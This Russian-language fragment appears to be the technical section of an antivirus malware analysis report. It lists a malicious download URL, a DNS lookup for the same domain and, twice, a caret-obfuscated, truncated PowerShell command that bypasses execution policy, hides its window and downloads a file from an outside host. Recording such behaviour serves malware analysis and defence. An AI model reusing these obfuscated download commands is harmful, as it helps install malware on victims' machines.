Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWE^rsh^e^ll.^EXE ^-^exEc^u^tIO^n^pO^LiCy BypA^Ss^ -^nOprOfiL^E^ ^-^wiNdOwstY^Le^ ^HiD^d^E^N^ (n^Ew^-O^BjeCT s^ysTEm^.^n^Et.wEBcLie^nT)^.^DOwN^loAdF^il^e('http://www.doorasope.t...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "PoWE^rsh^e^ll.^EXE ^-^exEc^u^tIO^n^pO^LiCy BypA^Ss^ -^nOprOfiL^E^ ^-^wiNdOwstY^Le^ ^HiD^d^E^N^ (n^Ew^-O^BjeCT s^ysTEm^.^n^Et.wEBcLie^nT)^.^DOwN^loAdF^il^e('http://www.doorasope.t...' (со скрытым окном)